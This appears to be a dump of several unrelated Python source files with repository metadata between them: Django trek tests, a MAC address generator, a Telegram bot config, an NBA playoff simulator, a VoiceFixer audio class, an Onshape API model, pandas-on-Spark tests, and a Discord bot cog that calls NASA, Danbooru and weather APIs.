def setUp(self):
self.trek1 = TrekFactory(name="1")
self.trek2 = TrekFactory(name="2")
self.trek3 = TrekFactory(name="3")
TrekRelationshipFactory(trek_a=self.trek1, trek_b=self.trek2)
TrekRelationshipFactory(trek_a=self.trek2, trek_b=self.trek3)
def test_related_treks_symetries(self):
self.assertCountEqual(self.trek1.related.all(), [self.trek2])
self.assertCountEqual(self.trek2.related.all(), [self.trek1, self.trek3])
self.assertCountEqual(self.trek3.related.all(), [self.trek2])
def test_symetrical_relationships(self):
relations_1 = TrekRelationship.objects.filter(Q(trek_a=self.trek1) | Q(trek_b=self.trek1))
relations_2 = TrekRelationship.objects.filter(Q(trek_a=self.trek2) | Q(trek_b=self.trek2))
relations_3 = TrekRelationship.objects.filter(Q(trek_a=self.trek3) | Q(trek_b=self.trek3))
self.assertEqual(len(relations_1), 2)
self.assertEqual(len(relations_2), 4)
self.assertEqual(len(relations_3), 2)
def test_relationship_fails_if_duplicate(self):
# This should fail, since it already exists
def create_dup():
return TrekRelationshipFactory(trek_a=self.trek2, trek_b=self.trek1)
self.assertRaises(IntegrityError, create_dup)
| 43.083333
| 98
| 0.722115
|
09cdfb3aae3976468432da0c2ed7f473b966c314
| 297
|
py
|
Python
|
macgen.py
|
MagicVin/Virtualization-Lab
|
087671f8387b716f51eeb9aa347217782283cfba
|
[
"MIT"
] | null | null | null |
macgen.py
|
MagicVin/Virtualization-Lab
|
087671f8387b716f51eeb9aa347217782283cfba
|
[
"MIT"
] | null | null | null |
macgen.py
|
MagicVin/Virtualization-Lab
|
087671f8387b716f51eeb9aa347217782283cfba
|
[
"MIT"
] | 1
|
2022-02-01T05:33:39.000Z
|
2022-02-01T05:33:39.000Z
|
#!/usr/bin/env python3
import random
def randomMAC():
mac = [ 0x00, 0x16, 0x3e,
random.randint(0x00, 0x7f),
random.randint(0x00,0xff),
random.randint(0x00,0xff)]
return ':'.join(map(lambda x: '%02x' % x, mac))
#return ':'.join(map(lambda x: format(x, '02x'), mac))
print(randomMAC())
| 22.846154
| 56
| 0.646465
|
827318bd47c604eb3b0828448db316fb4acd2446
| 1,619
|
py
|
Python
|
sample_config.py
|
freshremix/YouTube-Downloader-1
|
6cf005885d6bfd152e80aa1c73f878bfd03fd04a
|
[
"MIT"
] | 1
|
2021-04-07T16:33:36.000Z
|
2021-04-07T16:33:36.000Z
|
sample_config.py
|
freshremix/YouTube-Downloader-1
|
6cf005885d6bfd152e80aa1c73f878bfd03fd04a
|
[
"MIT"
] | null | null | null |
sample_config.py
|
freshremix/YouTube-Downloader-1
|
6cf005885d6bfd152e80aa1c73f878bfd03fd04a
|
[
"MIT"
] | 7
|
2021-09-24T00:16:25.000Z
|
2022-03-18T03:37:58.000Z
|
import os
class Config(object):
# get a token from @BotFather
TG_BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
# The Telegram API things
# Get these values from my.telegram.org
APP_ID = int(os.environ.get("APP_ID", 12345))
API_HASH = os.environ.get("API_HASH")
# Array to store users who are authorized to use the bot
AUTH_USERS = set(int(x) for x in os.environ.get("AUTH_USERS", "").split())
# the download location, where the HTTP Server runs
DOWNLOAD_LOCATION = "./DOWNLOADS"
# Telegram maximum file upload size
TG_MAX_FILE_SIZE = 2097152000
# chunk size that should be used with requests
CHUNK_SIZE = 128
# Generate screenshots for file after uploading
# Defaults to True
SCREENSHOTS = os.environ.get("SCREENSHOTS", "True")
# default thumbnail to be used in the videos
DEF_THUMB_NAIL_VID_S = os.environ.get("DEF_THUMB_NAIL_VID_S", "https://placehold.it/90x90")
# proxy for accessing youtube-dl in GeoRestricted Areas
# Get your own proxy from https://github.com/rg3/youtube-dl/issues/1091#issuecomment-230163061
HTTP_PROXY = os.environ.get("HTTP_PROXY", "")
# Update channel for Force Subscribe
UPDATE_CHANNEL = os.environ.get("UPDATE_CHANNEL", "")
# maximum message length in Telegram
MAX_MESSAGE_LENGTH = 4096
# set timeout for subprocess
PROCESS_MAX_TIMEOUT = int(os.environ.get("TIME_LIMIT"))
# dict to hold the ReQuest queue
ADL_BOT_RQ = {}
# watermark file
DEF_WATER_MARK_FILE = ""
# Sql Database url
DB_URI = os.environ.get("DATABASE_URL", "")
| 29.436364
| 98
| 0.686226
|
6e70b7b7f0b528f0ade3cab8ce98ef3f692a1104
| 6,463
|
py
|
Python
|
python/simPlayoffs.py
|
saisenberg/nba-sim
|
1b839496f77d45173aa98663f98de634fbb31a47
|
[
"MIT"
] | 2
|
2019-10-21T12:45:40.000Z
|
2021-05-22T11:12:05.000Z
|
python/simPlayoffs.py
|
saisenberg/nba-sim
|
1b839496f77d45173aa98663f98de634fbb31a47
|
[
"MIT"
] | null | null | null |
python/simPlayoffs.py
|
saisenberg/nba-sim
|
1b839496f77d45173aa98663f98de634fbb31a47
|
[
"MIT"
] | 1
|
2018-10-14T11:37:15.000Z
|
2018-10-14T11:37:15.000Z
|
from playoffInitialize import playoffInitialize
from playoffSeriesSim import playoffSeriesSim
# Simulate round 1 of playoffs
def simRound1(standings_combined, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print=False, result_print=False):
playoffInitialize(depth)
# Initialize seedings and matchups
playoff_teams_east = standings_combined['east'][0:8]
playoff_teams_west = standings_combined['west'][0:8]
seeds1 = [(1,8), (2,7), (3,6), (4,5)]
rd1 = {'east':[], 'west':[]}
for seed_matchup in seeds1:
team1 = playoff_teams_east[seed_matchup[0]-1][0]
team2 = playoff_teams_east[seed_matchup[1]-1][0]
rd1['east'].append({team1:seed_matchup[0], team2:seed_matchup[1]})
team1 = playoff_teams_west[seed_matchup[0]-1][0]
team2 = playoff_teams_west[seed_matchup[1]-1][0]
rd1['west'].append({team1:seed_matchup[0], team2:seed_matchup[1]})
# Simulate round 1
if (injury_print) | (result_print):
print('Round 1:\n--------')
winners_rd1 = []
for conf in rd1:
for matchup in rd1[conf]:
team1 = list(matchup.keys())[0]
team2 = list(matchup.keys())[1]
series_result = playoffSeriesSim(team1, team2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print=injury_print, result_print=result_print)
winner = max(series_result, key=series_result.get)
winners_rd1.append(winner)
if (injury_print) | (result_print):
print('')
return(winners_rd1)
# Simulate round 2 of playoffs
def simRound2(standings_combined, winners_rd1, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print=False, result_print=False):
# Initialize seedings and matchups
rd2 = {'east1458':[], 'east2367':[], 'west1458':[], 'west2367':[]}
seeds2 = [(1,4,5,8), (2,3,6,7)]
for team in winners_rd1:
if team in [i[0] for i in standings_combined['east']]:
seed = [i[0] for i in standings_combined['east']].index(team)+1
if seed in seeds2[0]:
rd2['east1458'].append(team)
elif seed in seeds2[1]:
rd2['east2367'].append(team)
elif team in [i[0] for i in standings_combined['west']]:
seed = [i[0] for i in standings_combined['west']].index(team)+1
if seed in seeds2[0]:
rd2['west1458'].append(team)
elif seed in seeds2[1]:
rd2['west2367'].append(team)
# Simulate round 2
if (injury_print) | (result_print):
print('Round 2:\n--------')
winners_rd2 = []
for matchup in rd2:
team1 = rd2[matchup][0]
team2 = rd2[matchup][1]
series_result = playoffSeriesSim(team1, team2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print=injury_print, result_print=result_print)
winner = max(series_result, key=series_result.get)
winners_rd2.append(winner)
if (injury_print) | (result_print):
print('')
return(winners_rd2)
# Simulate round 3 of playoffs (conference championship)
def simRound3(standings_combined, winners_rd2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print=False, result_print=False):
# Initialize seedings and matchups
rd3 = {'east':[], 'west':[]}
for team in winners_rd2:
if team in [i[0] for i in standings_combined['east']]:
rd3['east'].append(team)
elif team in [i[0] for i in standings_combined['west']]:
rd3['west'].append(team)
# Simulate round 3
if (injury_print) | (result_print):
print('Round 3:\n--------')
winners_rd3 = []
for matchup in rd3:
team1 = rd3[matchup][0]
team2 = rd3[matchup][1]
series_result = playoffSeriesSim(team1, team2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print=injury_print, result_print=result_print)
winner = max(series_result, key=series_result.get)
winners_rd3.append(winner)
if (injury_print) | (result_print):
print('')
return(winners_rd3)
# Simulate Finals
def simFinals(winners_rd3, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print=False, result_print=False):
if (injury_print) | (result_print):
print('Finals:\n--------')
team1 = winners_rd3[0]
team2 = winners_rd3[1]
series_result = playoffSeriesSim(team1, team2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print=injury_print, result_print=result_print)
winner = max(series_result, key=series_result.get)
if (injury_print) | (result_print):
print('')
return(winner)
# Simulate entire playoffs
def simPlayoffs(standings_combined, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print=False, result_print=False):
winners_rd1 = simRound1(standings_combined, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print, result_print)
winners_rd2 = simRound2(standings_combined, winners_rd1, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print, result_print)
winners_rd3 = simRound3(standings_combined, winners_rd2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print, result_print)
winner = simFinals(winners_rd3, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
win_prob_power, injury_freq, injury_print, result_print)
runnerup = [team for team in winners_rd3 if team is not winner][0]
semifinal_east = [team for team in winners_rd2 if team not in [winner, runnerup]][0]
semifinal_west = [team for team in winners_rd2 if team not in [winner, runnerup]][1]
return(winner, runnerup, semifinal_east, semifinal_west)
| 46.164286
| 127
| 0.63763
|
22b192e4be7b7eedea13e134737ce51a23b66f11
| 5,710
|
py
|
Python
|
voicefixer/base.py
|
ishine/voicefixer
|
0966a2f39096575cf8ae3fed8b53daf2f4512f35
|
[
"MIT"
] | 159
|
2021-09-26T08:09:45.000Z
|
2022-03-30T07:51:02.000Z
|
voicefixer/base.py
|
ishine/voicefixer
|
0966a2f39096575cf8ae3fed8b53daf2f4512f35
|
[
"MIT"
] | 15
|
2021-09-30T04:28:09.000Z
|
2022-03-27T05:06:32.000Z
|
voicefixer/base.py
|
ishine/voicefixer
|
0966a2f39096575cf8ae3fed8b53daf2f4512f35
|
[
"MIT"
] | 32
|
2021-09-27T03:24:01.000Z
|
2022-03-30T07:52:15.000Z
|
import librosa.display
from voicefixer.tools.pytorch_util import *
from voicefixer.tools.wav import *
from voicefixer.restorer.model import VoiceFixer as voicefixer_fe
import os
EPS = 1e-8
class VoiceFixer(nn.Module):
def __init__(self):
super(VoiceFixer, self).__init__()
self._model = voicefixer_fe(channels=2, sample_rate=44100)
# print(os.path.join(os.path.expanduser('~'), ".cache/voicefixer/analysis_module/checkpoints/epoch=15_trimed_bn.ckpt"))
self._model.load_state_dict(
torch.load(
os.path.join(
os.path.expanduser("~"),
".cache/voicefixer/analysis_module/checkpoints/vf.ckpt",
)
)
)
self._model.eval()
def _load_wav_energy(self, path, sample_rate, threshold=0.95):
wav_10k, _ = librosa.load(path, sr=sample_rate)
stft = np.log10(np.abs(librosa.stft(wav_10k)) + 1.0)
fbins = stft.shape[0]
e_stft = np.sum(stft, axis=1)
for i in range(e_stft.shape[0]):
e_stft[-i - 1] = np.sum(e_stft[: -i - 1])
total = e_stft[-1]
for i in range(e_stft.shape[0]):
if e_stft[i] < total * threshold:
continue
else:
break
return wav_10k, int((sample_rate // 2) * (i / fbins))
def _load_wav(self, path, sample_rate, threshold=0.95):
wav_10k, _ = librosa.load(path, sr=sample_rate)
return wav_10k
def _amp_to_original_f(self, mel_sp_est, mel_sp_target, cutoff=0.2):
freq_dim = mel_sp_target.size()[-1]
mel_sp_est_low, mel_sp_target_low = (
mel_sp_est[..., 5 : int(freq_dim * cutoff)],
mel_sp_target[..., 5 : int(freq_dim * cutoff)],
)
energy_est, energy_target = torch.mean(mel_sp_est_low, dim=(2, 3)), torch.mean(
mel_sp_target_low, dim=(2, 3)
)
amp_ratio = energy_target / energy_est
return mel_sp_est * amp_ratio[..., None, None], mel_sp_target
def _trim_center(self, est, ref):
diff = np.abs(est.shape[-1] - ref.shape[-1])
if est.shape[-1] == ref.shape[-1]:
return est, ref
elif est.shape[-1] > ref.shape[-1]:
min_len = min(est.shape[-1], ref.shape[-1])
est, ref = est[..., int(diff // 2) : -int(diff // 2)], ref
est, ref = est[..., :min_len], ref[..., :min_len]
return est, ref
else:
min_len = min(est.shape[-1], ref.shape[-1])
est, ref = est, ref[..., int(diff // 2) : -int(diff // 2)]
est, ref = est[..., :min_len], ref[..., :min_len]
return est, ref
def _pre(self, model, input, cuda):
input = input[None, None, ...]
input = torch.tensor(input)
input = try_tensor_cuda(input, cuda=cuda)
sp, _, _ = model.f_helper.wav_to_spectrogram_phase(input)
mel_orig = model.mel(sp.permute(0, 1, 3, 2)).permute(0, 1, 3, 2)
# return models.to_log(sp), models.to_log(mel_orig)
return sp, mel_orig
def remove_higher_frequency(self, wav, ratio=0.95):
stft = librosa.stft(wav)
real, img = np.real(stft), np.imag(stft)
mag = (real**2 + img**2) ** 0.5
cos, sin = real / (mag + EPS), img / (mag + EPS)
spec = np.abs(stft) # [1025,T]
feature = spec.copy()
feature = np.log10(feature + EPS)
feature[feature < 0] = 0
energy_level = np.sum(feature, axis=1)
threshold = np.sum(energy_level) * ratio
curent_level, i = energy_level[0], 0
while i < energy_level.shape[0] and curent_level < threshold:
curent_level += energy_level[i + 1, ...]
i += 1
spec[i:, ...] = np.zeros_like(spec[i:, ...])
stft = spec * cos + 1j * spec * sin
return librosa.istft(stft)
@torch.no_grad()
def restore_inmem(self, wav_10k, cuda=False, mode=0, your_vocoder_func=None):
check_cuda_availability(cuda=cuda)
self._model = try_tensor_cuda(self._model, cuda=cuda)
if mode == 0:
self._model.eval()
elif mode == 1:
self._model.eval()
elif mode == 2:
self._model.train() # More effective on seriously demaged speech
res = []
seg_length = 44100 * 30
break_point = seg_length
while break_point < wav_10k.shape[0] + seg_length:
segment = wav_10k[break_point - seg_length : break_point]
if mode == 1:
segment = self.remove_higher_frequency(segment)
sp, mel_noisy = self._pre(self._model, segment, cuda)
out_model = self._model(sp, mel_noisy)
denoised_mel = from_log(out_model["mel"])
if your_vocoder_func is None:
out = self._model.vocoder(denoised_mel, cuda=cuda)
else:
out = your_vocoder_func(denoised_mel)
# unify energy
if torch.max(torch.abs(out)) > 1.0:
out = out / torch.max(torch.abs(out))
print("Warning: Exceed energy limit,", input)
# frame alignment
out, _ = self._trim_center(out, segment)
res.append(out)
break_point += seg_length
out = torch.cat(res, -1)
return tensor2numpy(out.squeeze(0))
def restore(self, input, output, cuda=False, mode=0, your_vocoder_func=None):
wav_10k = self._load_wav(input, sample_rate=44100)
out_np_wav = self.restore_inmem(
wav_10k, cuda=cuda, mode=mode, your_vocoder_func=your_vocoder_func
)
save_wave(out_np_wav, fname=output, sample_rate=44100)
| 40.785714
| 127
| 0.570053
|
e46509404c1da16bf74fffac2e5ba1d83e29df14
| 5,326
|
py
|
Python
|
python/onshape_client/oas/models/btp_statement_return281_all_of.py
|
toebes/onshape-clients
|
a26cf6a77cfc7901321e603d5a097e23eb51e35c
|
[
"MIT"
] | 14
|
2019-06-23T08:47:41.000Z
|
2021-11-29T16:28:45.000Z
|
python/onshape_client/oas/models/btp_statement_return281_all_of.py
|
toebes/onshape-clients
|
a26cf6a77cfc7901321e603d5a097e23eb51e35c
|
[
"MIT"
] | 40
|
2019-05-22T14:39:46.000Z
|
2022-03-10T10:36:17.000Z
|
python/onshape_client/oas/models/btp_statement_return281_all_of.py
|
toebes/onshape-clients
|
a26cf6a77cfc7901321e603d5a097e23eb51e35c
|
[
"MIT"
] | 24
|
2019-06-02T01:03:41.000Z
|
2022-03-29T13:25:36.000Z
|
# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import btp_expression9
except ImportError:
btp_expression9 = sys.modules["onshape_client.oas.models.btp_expression9"]
try:
from onshape_client.oas.models import btp_space10
except ImportError:
btp_space10 = sys.modules["onshape_client.oas.models.btp_space10"]
class BTPStatementReturn281AllOf(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"space_after_return": (btp_space10.BTPSpace10,), # noqa: E501
"value": (btp_expression9.BTPExpression9,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"bt_type": "btType", # noqa: E501
"space_after_return": "spaceAfterReturn", # noqa: E501
"value": "value", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btp_statement_return281_all_of.BTPStatementReturn281AllOf - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
space_after_return (btp_space10.BTPSpace10): [optional] # noqa: E501
value (btp_expression9.BTPExpression9): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
| 33.496855
| 97
| 0.614532
|
c6a2852e5b2718a41834746d657d4baa50746bc3
| 5,360
|
py
|
Python
|
python/pyspark/pandas/tests/test_ops_on_diff_frames_groupby_expanding.py
|
nolanliou/spark
|
20750a3f9e13a2f02860859f87bbc38a18cba85e
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2021-06-29T01:32:35.000Z
|
2021-08-19T15:20:26.000Z
|
python/pyspark/pandas/tests/test_ops_on_diff_frames_groupby_expanding.py
|
nolanliou/spark
|
20750a3f9e13a2f02860859f87bbc38a18cba85e
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 29
|
2021-06-02T09:17:28.000Z
|
2022-03-14T01:35:18.000Z
|
python/pyspark/pandas/tests/test_ops_on_diff_frames_groupby_expanding.py
|
nolanliou/spark
|
20750a3f9e13a2f02860859f87bbc38a18cba85e
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2017-03-04T15:26:52.000Z
|
2021-12-17T17:42:52.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from distutils.version import LooseVersion
import numpy as np
import pandas as pd
from pyspark import pandas as ps
from pyspark.pandas.config import set_option, reset_option
from pyspark.testing.pandasutils import PandasOnSparkTestCase, TestUtils
class OpsOnDiffFramesGroupByExpandingTest(PandasOnSparkTestCase, TestUtils):
@classmethod
def setUpClass(cls):
super().setUpClass()
set_option("compute.ops_on_diff_frames", True)
@classmethod
def tearDownClass(cls):
reset_option("compute.ops_on_diff_frames")
super().tearDownClass()
def _test_groupby_expanding_func(self, f):
pser = pd.Series([1, 2, 3])
pkey = pd.Series([1, 2, 3], name="a")
psser = ps.from_pandas(pser)
kkey = ps.from_pandas(pkey)
self.assert_eq(
getattr(psser.groupby(kkey).expanding(2), f)().sort_index(),
getattr(pser.groupby(pkey).expanding(2), f)().sort_index(),
)
pdf = pd.DataFrame({"a": [1, 2, 3, 2], "b": [4.0, 2.0, 3.0, 1.0]})
pkey = pd.Series([1, 2, 3, 2], name="a")
psdf = ps.from_pandas(pdf)
kkey = ps.from_pandas(pkey)
self.assert_eq(
getattr(psdf.groupby(kkey).expanding(2), f)().sort_index(),
getattr(pdf.groupby(pkey).expanding(2), f)().sort_index(),
)
self.assert_eq(
getattr(psdf.groupby(kkey)["b"].expanding(2), f)().sort_index(),
getattr(pdf.groupby(pkey)["b"].expanding(2), f)().sort_index(),
)
self.assert_eq(
getattr(psdf.groupby(kkey)[["b"]].expanding(2), f)().sort_index(),
getattr(pdf.groupby(pkey)[["b"]].expanding(2), f)().sort_index(),
)
def test_groupby_expanding_count(self):
# The behaviour of ExpandingGroupby.count are different between pandas>=1.0.0 and lower,
# and we're following the behaviour of latest version of pandas.
if LooseVersion(pd.__version__) >= LooseVersion("1.0.0"):
self._test_groupby_expanding_func("count")
else:
# Series
psser = ps.Series([1, 2, 3])
kkey = ps.Series([1, 2, 3], name="a")
midx = pd.MultiIndex.from_tuples(
list(zip(kkey.to_pandas().values, psser.index.to_pandas().values)),
names=["a", None],
)
expected_result = pd.Series([np.nan, np.nan, np.nan], index=midx)
self.assert_eq(
psser.groupby(kkey).expanding(2).count().sort_index(), expected_result.sort_index()
)
# DataFrame
psdf = ps.DataFrame({"a": [1, 2, 3, 2], "b": [4.0, 2.0, 3.0, 1.0]})
kkey = ps.Series([1, 2, 3, 2], name="a")
midx = pd.MultiIndex.from_tuples([(1, 0), (2, 1), (2, 3), (3, 2)], names=["a", None])
expected_result = pd.DataFrame(
{"a": [None, None, 2.0, None], "b": [None, None, 2.0, None]}, index=midx
)
self.assert_eq(
psdf.groupby(kkey).expanding(2).count().sort_index(), expected_result.sort_index()
)
expected_result = pd.Series([None, None, 2.0, None], index=midx, name="b")
self.assert_eq(
psdf.groupby(kkey)["b"].expanding(2).count().sort_index(),
expected_result.sort_index(),
)
expected_result = pd.DataFrame({"b": [None, None, 2.0, None]}, index=midx)
self.assert_eq(
psdf.groupby(kkey)[["b"]].expanding(2).count().sort_index(),
expected_result.sort_index(),
)
def test_groupby_expanding_min(self):
self._test_groupby_expanding_func("min")
def test_groupby_expanding_max(self):
self._test_groupby_expanding_func("max")
def test_groupby_expanding_mean(self):
self._test_groupby_expanding_func("mean")
def test_groupby_expanding_sum(self):
self._test_groupby_expanding_func("sum")
def test_groupby_expanding_std(self):
self._test_groupby_expanding_func("std")
def test_groupby_expanding_var(self):
self._test_groupby_expanding_func("var")
if __name__ == "__main__":
import unittest
from pyspark.pandas.tests.test_ops_on_diff_frames_groupby_expanding import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| 39.124088
| 99
| 0.625
|
43a986766b0e690729eecf344f70123725edeefd
| 6,902
|
py
|
Python
|
src/cogs/apis.py
|
Dakskihedron/kitakami
|
0c1b9530690669aac581d9c8d98e605b9b253ad7
|
[
"MIT"
] | null | null | null |
src/cogs/apis.py
|
Dakskihedron/kitakami
|
0c1b9530690669aac581d9c8d98e605b9b253ad7
|
[
"MIT"
] | 1
|
2021-07-29T06:55:32.000Z
|
2021-07-29T06:55:32.000Z
|
src/cogs/apis.py
|
Dakskihedron/kitakami
|
0c1b9530690669aac581d9c8d98e605b9b253ad7
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
from datetime import datetime
import aiohttp
import json
import os
import random
import re
nasa_api_key = os.getenv('NASA_API_KEY')
owm_api_key = os.getenv('OWM_API_KEY')
class APIs(commands.Cog):
"""Commands related to APIs."""
def __init__(self, bot):
self.bot = bot
self.image_cache = {}
self.config = None
async def get_data(self, url):
timeout = aiohttp.ClientTimeout(total=10)
async with aiohttp.ClientSession(timeout=timeout) as session:
async with session.get(url) as r:
data = await r.json()
try:
r.raise_for_status()
return data, None
except aiohttp.ClientResponseError as e:
status = e.status
return data, status
except aiohttp.web.Exception as e:
print(e)
@commands.Cog.listener()
async def on_ready(self):
print("Loading config file...")
try:
with open('././config.json') as config:
self.config = json.load(config)
print("Config file successfully loaded.")
if 'blacklist' in self.config:
print("Danbooru blacklist found.")
else:
raise FileNotFoundError()
except FileNotFoundError:
print(
"Config file or Danbooru blacklist missing. "
"Disabling 'danbooru' command."
)
self.bot.remove_command('danbooru')
@commands.command()
@commands.guild_only()
async def apod(self, ctx, date=None):
"""Show the Astronomical Picture of the Day.
date: yyyy-mm-dd
Optional date for a specific picture.
"""
url = f'https://api.nasa.gov/planetary/apod?api_key={nasa_api_key}'
if date is not None:
url += f'&date={date}'
data, status = await self.get_data(url)
if data and status:
return await ctx.reply(f"{status}: {data['msg']}")
if data['media_type'] == 'image':
embed = discord.Embed(
title=f"{data['title']}",
colour=discord.Colour.blurple()
)
embed.set_image(url=data['url'])
if 'copyright' in data:
embed.set_footer(
text=f"Image Credit & Copyright: {data['copyright']}"
)
else:
embed.set_footer(text='Public Domain')
return await ctx.send(embed=embed)
if data['media_type'] == 'video' and 'youtube' in data['url']:
url = re.search(
'https://www.youtube.com/embed/(.*)?rel=0', data['url']
)
return await ctx.send(f"https://youtu.be/{url.group(1)}")
await ctx.send(data['url'])
@commands.command()
@commands.is_nsfw()
@commands.guild_only()
async def danbooru(self, ctx, *, tags=''):
"""Show a random image from Danbooru.
tag: str
Optional tag(s) for narrowing image search.
"""
for tag in self.config['blacklist']:
if tag in tags.lower():
return await ctx.reply("The specified tag(s) are blacklisted.")
url = (
f'https://danbooru.donmai.us/'
f'posts.json?limit=200&tags={tags}')
data, status = await self.get_data(url)
if data and status:
return await ctx.reply(f"{status}: {data['message']}")
if len(data) == 0:
return await ctx.reply(
"The specified tag(s) returned no results."
)
post = random.choice(data)
msg = await ctx.send(post['file_url'])
self.image_cache[ctx.author.id] = msg.id
@commands.command()
@commands.is_nsfw()
@commands.guild_only()
async def undo(self, ctx):
"""Remove your recently requested image."""
try:
request = self.image_cache[ctx.author.id]
except KeyError:
return await ctx.reply("No image to remove.")
msg = await ctx.channel.fetch_message(request)
await msg.delete()
self.image_cache.pop(ctx.author.id)
@commands.command()
@commands.guild_only()
async def weather(self, ctx, *, location):
"""Retrieve weather data for a location from OpenWeatherMap.
location: str
The location to retrieve weather data for.
"""
url = (
f'https://api.openweathermap.org/'
f'data/2.5/weather?q={location}'
f'&appid={owm_api_key}&units=metric'
)
data, status = await self.get_data(url)
if data and status:
return await ctx.reply(f"{status}: {data['message']}")
sys = data['sys']
weather = data['weather'][0]
main = data['main']
wind = data['wind']
if 'country' not in sys:
title = f"{data['name']}"
else:
title = f"{data['name']}, {sys['country']}"
embed = discord.Embed(
title=title,
colour=discord.Colour.blurple(),
description=(
f"**{round(main['temp'])}\u00b0C**"
f"\u2002{weather['main']} ({weather['description']})"
)
)
embed.set_thumbnail(
url=(
f'http://openweathermap.org/'
f"img/wn/{weather['icon']}@2x.png"
)
)
if 'rain' not in data:
rain = '0'
else:
rain = data['rain']['1h']
compass_dir = [
'N', 'NNE', 'NE', 'ENE',
'E', 'ESE', 'SE', 'SSE',
'S', 'SSW', 'SW', 'WSW',
'W', 'WNW', 'NW', 'NNW',
'N',
]
wind_dir = compass_dir[round((wind['deg'] % 360) / 22.5)]
embed.add_field(
name='Temperatures',
value=f"""
Min Temp: {round(main['temp_min'])}\u00b0C
Max Temp: {round(main['temp_max'])}\u00b0C
""",
inline=False
)
embed.add_field(
name='Atmospherics',
value=f"""
Percipitation: {rain} mm
Humidity: {main['humidity']}%
Wind Speed: {round(wind['speed'], 1)} m/s {wind_dir}
